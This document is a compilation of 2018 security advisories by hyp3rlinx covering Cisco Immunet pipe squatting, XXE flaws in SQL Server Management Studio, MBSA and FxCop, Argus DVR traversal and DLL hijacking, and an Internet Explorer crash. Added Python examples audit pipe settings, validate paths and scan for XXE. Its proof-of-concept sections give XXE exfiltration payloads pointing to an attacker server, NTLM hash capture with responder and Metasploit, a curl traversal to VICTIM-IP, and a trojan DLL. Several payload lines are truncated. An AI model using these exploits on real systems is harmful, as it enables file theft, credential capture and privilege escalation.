    /* Keep re-creating the service's pipe name so the scan service never owns it. */
    while (TRUE) {
        HANDLE pipe = CreateNamedPipe(pipename,
                                      PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND,
                                      PIPE_WAIT,
                                      1,            /* nMaxInstances */
                                      1024, 1024,   /* out/in buffer sizes */
                                      120 * 1000,   /* default timeout, ms */
                                      NULL);        /* default security */
        if (pipe == INVALID_HANDLE_VALUE) {
            printf("Error: %lu", GetLastError());
        } else {
            printf("%s", "pipe created\n");
            printf("%p", (void *)pipe);
        }
        ConnectNamedPipe(pipe, NULL);
        if (ImpersonateNamedPipeClient(pipe)) {
            printf("ok!");
        } else {
            printf("%s%lu", "WTF", GetLastError());
        }
        CloseHandle(pipe);
    }
    return 0;
}

[Network Access]
Local / Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: August 7, 2018
Vendor acknowledgement: August 7, 2018
Vendor released fixes: November 7th, 2018
November 8, 2018 : Public Disclosure
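The following is an added example, not code from the advisory or from Cisco: it transcribes the parameters the disassembly above passes to SetSecurityDescriptorDacl and CreateNamedPipeW (dwOpenMode 4003h, dwPipeMode 6, nMaxInstances 0FFh, pDacl NULL) into a small audit that reports the four weaknesses a reviewer of any privileged pipe server would check for, next to a hardened counterpart; the SDDL string and the hardened values are illustrative assumptions, the flag constants are the documented Win32 values.

```python
"""Audit a CreateNamedPipeW call site for the weaknesses behind CVE-2018-15437.

Added example: the Immunet input below is a transcription of the disassembly in
the advisory; the hardened counterpart and its SDDL DACL are illustrative.
"""
from __future__ import annotations

from dataclasses import dataclass

# winbase.h: dwOpenMode bits
PIPE_ACCESS_INBOUND = 0x00000001
PIPE_ACCESS_OUTBOUND = 0x00000002
PIPE_ACCESS_DUPLEX = 0x00000003
FILE_FLAG_FIRST_PIPE_INSTANCE = 0x00080000
FILE_FLAG_OVERLAPPED = 0x40000000
FILE_FLAG_WRITE_THROUGH = 0x80000000
# winbase.h: dwPipeMode bits
PIPE_READMODE_MESSAGE = 0x00000002
PIPE_TYPE_MESSAGE = 0x00000004
PIPE_REJECT_REMOTE_CLIENTS = 0x00000008
# nMaxInstances
PIPE_UNLIMITED_INSTANCES = 255

_OPEN_MODE_FLAGS = {
    FILE_FLAG_FIRST_PIPE_INSTANCE: "FILE_FLAG_FIRST_PIPE_INSTANCE",
    FILE_FLAG_OVERLAPPED: "FILE_FLAG_OVERLAPPED",
    FILE_FLAG_WRITE_THROUGH: "FILE_FLAG_WRITE_THROUGH",
}
_ACCESS_NAMES = {1: "PIPE_ACCESS_INBOUND", 2: "PIPE_ACCESS_OUTBOUND", 3: "PIPE_ACCESS_DUPLEX"}


@dataclass(frozen=True)
class PipeCreation:
    """What the server hands to SetSecurityDescriptorDacl and CreateNamedPipeW."""
    open_mode: int
    pipe_mode: int
    max_instances: int
    dacl_present: bool      # bDaclPresent argument
    dacl: str | None        # None models pDacl == NULL; a string stands for an explicit SDDL DACL


def describe_open_mode(open_mode: int) -> list[str]:
    """Name the access bits and flags in dwOpenMode; unknown bits are reported, never guessed."""
    names = [_ACCESS_NAMES.get(open_mode & PIPE_ACCESS_DUPLEX, "no access bits")]
    rest = open_mode & ~PIPE_ACCESS_DUPLEX
    for bit, name in _OPEN_MODE_FLAGS.items():
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"unrecognised bits 0x{rest:08X}")
    return names


def audit_pipe_creation(p: PipeCreation) -> list[tuple[str, str]]:
    """Return (code, explanation) pairs; an empty list means none of the four weaknesses is present."""
    findings = []
    if p.dacl_present and p.dacl is None:
        findings.append(("NULL_DACL",
                         "bDaclPresent=TRUE with pDacl=NULL is a NULL DACL: Everyone gets full control, "
                         "including FILE_CREATE_PIPE_INSTANCE, so any local user can add instances"))
    if not p.open_mode & FILE_FLAG_FIRST_PIPE_INSTANCE:
        findings.append(("NO_FIRST_PIPE_INSTANCE",
                         "without FILE_FLAG_FIRST_PIPE_INSTANCE the server cannot notice that another "
                         "process already owns the name; with it, a second creator gets ERROR_ACCESS_DENIED"))
    if not p.pipe_mode & PIPE_REJECT_REMOTE_CLIENTS:
        findings.append(("NO_REJECT_REMOTE",
                         "PIPE_REJECT_REMOTE_CLIENTS is not set, so the pipe accepts remote connections"))
    if p.max_instances == PIPE_UNLIMITED_INSTANCES:
        findings.append(("UNLIMITED_INSTANCES",
                         "nMaxInstances=PIPE_UNLIMITED_INSTANCES (0xFF): the instance count never caps squatters"))
    return findings


# Constructed from the Immunet listing above (sample input, not a live capture).
IMMUNET_CALL_SITE = PipeCreation(open_mode=0x4003, pipe_mode=6, max_instances=0xFF,
                                 dacl_present=True, dacl=None)

# Hardened counterpart (assumed values; SDDL grants SYSTEM full control, Administrators read/write).
HARDENED_CALL_SITE = PipeCreation(
    open_mode=PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE,
    pipe_mode=PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_REJECT_REMOTE_CLIENTS,
    max_instances=1,
    dacl_present=True,
    dacl="D:(A;;GA;;;SY)(A;;GRGW;;;BA)",
)

if __name__ == "__main__":
    for label, site in (("Immunet", IMMUNET_CALL_SITE), ("hardened", HARDENED_CALL_SITE)):
        print(f"{label}: dwOpenMode = {', '.join(describe_open_mode(site.open_mode))}")
        for code, why in audit_pipe_creation(site) or [("OK", "no findings")]:
            print(f"  [{code}] {why}")
```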
[FD] CVE-2018-8533 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / REGSRVR file handling XML Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
CVE-2018-8533

[Security Issue]
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of REGSRVR files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process.

[Exploit/POC]
1) python -m SimpleHTTPServer

2) "POC.xml"
http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send;

3) "payload.dtd"
http://127.0.0.1:8000?%file;'>"> %all;

Result:
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -

[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533

[Network Access]
Remote

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory patch Tuesday : October 9, 2018
October 10, 2018 : Public Disclosure
[FD] CVE-2018-8527 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / xel filetype XML Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
CVE-2018-8527

[Security Issue]
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of XEL files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process.
[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527

[Exploit/POC]
python -m SimpleHTTPServer (listens Port 8000)

"evil.xel" (Extended Event Log File)
http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send;

"payload.dtd"
http://127.0.0.1:8000?%file;'>"> %all;

OR

Steal NTLM hashes

Kali linux /usr/share/responder/tools
responder -I eth0 -rv

"evil.xel"
%dtd;]>

Result: Forced authentication and NTLM hash captured

[Network Access]
Remote

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory patch Tuesday : October 9, 2018
October 10, 2018 : Public Disclosure
[FD] CVE-2018-8532 / Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / XML Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
CVE-2018-8532

[Security Issue]
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of XMLA files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process.

[Exploit/POC]
1) python -m SimpleHTTPServer

2) "test.xmla"
http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send;

3) "payload.dtd"
http://127.0.0.1:8000?%file;'>"> %all;

Result:
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -

[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532

[Network Access]
Remote

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory patch Tuesday : October 9, 2018
October 10, 2018 : Public Disclosure
[FD] ZDI-CAN-6307 / Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
[+] ISR: Apparition Security
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Microsoft Baseline Security Analyzer v2.3

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings.

[Vulnerability Type]
XML External Entity Injection

[ZDI Reference]
ZDI-CAN-6307

[Security Issue]
Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker-controlled server if a user opens a specially crafted ".mbsa" file.

[Exploit/POC]
Install MBSA https://www.microsoft.com/en-us/download/details.aspx?id=7558

1) "evil.mbsa"
http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send;

2) "payload.dtd"
http://127.0.0.1:8000?%file;'>"> %all;

When the victim attempts to open the file they get prompted "Do you want to let this app make changes to your device?" However, it also indicates it is a "verified publisher", namely Microsoft. After opening, the local user's files can be exfiltrated to a remote server. Moreover, we can use this to steal NTLM hashes.

Using Forced Authentication to steal NTLM hashes

2) msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit -j

"evil.mbsa"
%dtd;]>

Result: credentials captured by remote server

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Program deprecated
September 8, 2018 : Public Disclosure
[FD] Argus Surveillance DVR - 4.0.0.0 / Unauthenticated Directory Traversal File Disclosure
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
[+] ISR: Apparition Security
***Greetz: indoushka | Eduardo | GGA***

[Vendor]
www.argussurveillance.com

[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site. When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video. This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.

[Vulnerability Type]
Directory Traversal

[CVE Reference]
CVE-2018-15745

[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.

[Affected Component]
WEBACCOUNT.CGI RESULTPAGE parameter

[Exploit/POC]
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv

[Video POC URL]
https://vimeo.com/287115273

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure
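The following is an added example, not the Argus DVR code: it shows why the advisory's ..%2F payload gets past a check that looks for a literal "../" in the raw parameter (the test runs before URL decoding), and what a correct RESULTPAGE validation looks like: decode until the value stops changing, normalise separators, resolve every ".." segment, and refuse anything that leaves the web root. The web root path is a constructed placeholder, and the function names are this example's own.

```python
"""Validate a RESULTPAGE-style parameter before it is used to pick a file.

Added example for the WEBACCOUNT.CGI traversal above; WEB_ROOT is a placeholder,
not the product's real install path.
"""
from __future__ import annotations

from pathlib import PureWindowsPath
from urllib.parse import unquote

WEB_ROOT = PureWindowsPath(r"C:\Argus\web")   # constructed placeholder


def naive_check(param: str) -> bool:
    """The kind of check the ..%2F payload defeats: a substring test on the raw parameter."""
    return "../" not in param and "..\\" not in param


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so ..%252F is handled as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def check_result_page(param: str) -> tuple[bool, str]:
    """Return (allowed, resolved path) or (False, reason) for a RESULTPAGE value."""
    decoded = fully_decode(param)
    if "\x00" in decoded:
        return False, "NUL byte in path"
    decoded = decoded.replace("\\", "/")           # treat both separators alike
    # Absolute paths, drive letters and UNC prefixes never name a page under the web root.
    if decoded.startswith("/") or (len(decoded) > 1 and decoded[1] == ":"):
        return False, "absolute path rejected"
    stack: list[str] = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:                          # would climb above WEB_ROOT
                return False, "traversal above web root rejected"
            stack.pop()
            continue
        stack.append(segment)
    if not stack:
        return False, "empty page name"
    return True, str(WEB_ROOT.joinpath(*stack))


# The advisory's parameter value (16 encoded "../" segments), as constructed sample input.
ADVISORY_PAYLOAD = "..%2F" * 16 + "Windows%2Fsystem.ini"

if __name__ == "__main__":
    samples = (ADVISORY_PAYLOAD, "..%252F..%252FWindows%252Fsystem.ini",
               "login%2Fresult.htm", "a/../b.htm")
    for value in samples:
        print(f"{value!r}: naive={naive_check(value)} strict={check_result_page(value)}")
```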
[FD] Argus Surveillance DVR - 4.0.0.0 / SYSTEM Privilege Escalation
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo | GGA***

[Vendor]
www.argussurveillance.com

[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site. When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video. This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.

[Vulnerability Type]
SYSTEM Privilege Escalation

[CVE Reference]
N/A

[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation. Placing a Trojan DLL named "gsm_codec.dll" in the Argus application directory will lead to arbitrary code execution with SYSTEM integrity.

[Affected Component]
DVRWatchdog.exe

[Exploit/POC]
Create a 32-bit DLL named "gsm_codec.dll" and place it in the App Dir, launch Argus DVR, tada! You're now SYSTEM.
#include <windows.h>

/* hyp3rlinx */
/* gcc -c -m32 gsm_codec.c
   gcc -shared -m32 -o gsm_codec.dll gsm_codec.o */

/* Runs in the context of whichever process loads the DLL (DVRWatchdog.exe, SYSTEM). */
void systemo(void) {
    MessageBox(0, "3c184981367094fce3ab70efc3b44583", "philbin :)", MB_YESNO + MB_ICONQUESTION);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH: { systemo(); break; }
        case DLL_PROCESS_DETACH: { systemo(); break; }
        case DLL_THREAD_ATTACH:  { systemo(); break; }
        case DLL_THREAD_DETACH:  { systemo(); break; }
    }
    return TRUE;
}

[Video POC URL]
https://vimeo.com/287115698

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure
[FD] Microsoft Windows "FxCop" v10-12 / XML External Entity Injection
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: Apparition Security
***Greetz: indoushka|Eduardo|Dirty0tis***

Vendor:
www.microsoft.com

Product:
Microsoft Windows "FxCop" v10-12

Vulnerability Type:
XML External Entity

CVE Reference:
N/A

Security Issue:
FxCop is vulnerable to XML injection attacks allowing local file exfiltration and/or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK; it works in both. If you have the particular SDK in question it is probably there but needs to be installed, as it was for me.

MSRC Response:
"We’ve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0 as far as SDKs are concerned, with version 13.0 skipped). We have confirmation that the SDKs for Win8+ don’t ship FxCop. We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to run after an SDK’s install (if even feasible) would just draw attention to the problem. Visual Studio (specifically, C++) ships a trimmed-down version of the Windows 7 SDK, but it does not include FxCop, and so is unaffected. In summary, newer versions of FxCop are unaffected and we will pull afflicted versions from availability."

Exploit/POC:
1) python -m SimpleHTTPServer

2) "POC.FxCop"
http://ATTACKER-IP:8000/payload.dtd";> %dtd;]> &send;

3) "payload.dtd"
http://ATTACKER-IP:8000?%file;'>"> %all;

4) Import or Open the "POC.FxCop" file in FxCop

Files get exfiltrated to the attacker server.
Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: March 15, 2018
Vendor opens MSRC Case 44322?: March 16, 2018
Vendor reproduces issue : April 6, 2018
Vendor decides to pull all download links instead of advisory or fix : April 9, 2018
May 9, 2018 : Public Disclosure
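The five XXE advisories above (SSMS .regsrvr, .xel and .xmla files, MBSA .mbsa files and FxCop project files) all depend on the same DOCTYPE shape: a parameter entity that loads an external DTD and is then referenced. The following is an added example, not code from the advisories or from Microsoft: a pre-open scanner that flags those DTD constructs from the document text alone, so it runs offline and resolves nothing. The sample files are constructed for the demonstration and the external DTD they point at is deliberately absent.

```python
"""Flag the DTD constructs an XXE payload needs before a tool opens an XML file.

Added example; the samples are constructed and the scanner only inspects the
DOCTYPE, it never fetches anything.
"""
from __future__ import annotations

import re
from typing import NamedTuple


class Finding(NamedTuple):
    code: str
    detail: str


# <!DOCTYPE name [external-id] [ internal subset ]>
_DOCTYPE = re.compile(
    r"<!DOCTYPE\s+(?P<header>[^\[>]*)(?:\[(?P<subset>.*?)\]\s*)?>",
    re.IGNORECASE | re.DOTALL,
)
_EXTERNAL_ID = re.compile(r"\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)
_DECLARATION = re.compile(r"<!\w+.*?>", re.DOTALL)
_PARAM_ENTITY = re.compile(r"<!ENTITY\s+%\s*(\w+)", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
_PE_REFERENCE = re.compile(r"%(\w+);")


def scan_for_xxe(xml_text: str) -> list[Finding]:
    """Return the XXE indicators present in the DOCTYPE, in a fixed order."""
    m = _DOCTYPE.search(xml_text)
    if not m:
        return []                      # no DTD at all: nothing for a resolver to fetch
    header, subset = m.group("header"), m.group("subset") or ""
    findings: list[Finding] = []
    if _EXTERNAL_ID.search(header):    # <!DOCTYPE x SYSTEM "uri">: whole DTD fetched remotely
        findings.append(Finding("EXTERNAL_DTD", header.strip()))
    pe = _PARAM_ENTITY.search(subset)
    if pe:
        findings.append(Finding("PARAMETER_ENTITY", pe.group(1)))
    ext = _EXTERNAL_ENTITY.search(subset)
    if ext:
        findings.append(Finding("EXTERNAL_ENTITY", ext.group(1)))
    # A %name; reference outside any <!...> declaration expands the parameter entity inside
    # the internal subset, which is how a fetched DTD gets pulled into the document.
    body_only = _DECLARATION.sub("", subset)
    ref = _PE_REFERENCE.search(body_only)
    if ref:
        findings.append(Finding("PE_REFERENCE", ref.group(1)))
    return findings


def is_safe_to_open(xml_text: str) -> bool:
    return not scan_for_xxe(xml_text)


# Constructed samples. The DOCTYPE in SUSPICIOUS_XEL is the shape the advisory fragments show
# (a parameter entity loaded from payload.dtd and then referenced); the DTD itself is absent.
BENIGN_REGSRVR = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<RegisteredServers><ServerGroup name="Production"/></RegisteredServers>\n'
)
INTERNAL_ENTITY_ONLY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE note [ <!ENTITY vendor "Contoso"> ]>\n'
    '<note>&vendor;</note>\n'
)
SUSPICIOUS_XEL = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [\n'
    '  <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">\n'
    '  %dtd;\n'
    ']>\n'
    '<data>&send;</data>\n'
)
EXTERNAL_DOCTYPE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data SYSTEM "http://127.0.0.1:8000/payload.dtd">\n'
    '<data/>\n'
)

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_REGSRVR), ("internal-entity", INTERNAL_ENTITY_ONLY),
                       ("suspicious", SUSPICIOUS_XEL), ("external-doctype", EXTERNAL_DOCTYPE)):
        print(name, "->", scan_for_xxe(text) or "clean")
```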
[FD] [** FIX CODE TYPO] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
www.microsoft.com

Product:
Internet Explorer (Windows 10) v11.371.16299.0

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

Vulnerability Type:
Denial Of Service

CVE Reference:
N/A

Security Issue:
A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters a specially crafted HTML HREF tag containing an empty reference for certain Windows file types.

Upon IE crash it will at times daringly attempt to restart itself; if that occurs and the user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again.

This can be leveraged by visiting a hostile webpage or link to crash an end user's MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)

Tested Windows 10

Stack Dump:
(2e8c.27e4): Access violation - code c005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret
0:015> r
rax=005b rbx=0003 rcx=0003
rdx=00cca6efd3a8 rsi= rdi=0003
rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp=
r8= r9= r10=
r11=0246 r12=0010 r13=00cca6efd3a8
r14= r15=
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret

CONTEXT: (.ecxr)
rax= rbx=01fd4a2ec9d8 rcx=
rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi=
rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600
r8= r9=8000 r10=7ffabb499398
r11= r12= r13=7ffabb48d060
r14=0002 r15=0001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
7ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:`=
Resetting default scope

FAULTING_IP:
KERNELBASE!StrCmpICW+6
7ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006)
ExceptionCode: c005 (Access violation)
ExceptionFlags:
NumberParameters: 2
Parameter[0]:
Parameter[1]:
Attempt to read from address

DEFAULT_BUCKET_ID: NULL_POINTER_READ

PROCESS_NAME: iexplore.exe

POC video URL:
https://vimeo.com/265691256/

Exploit/POC:
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10

payload=('\n'+
'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+
'crashy ware shee\n'+
'\n'+
'Tested successfully on Windows 10\n'+
'\n'
'function doit(){\n'+
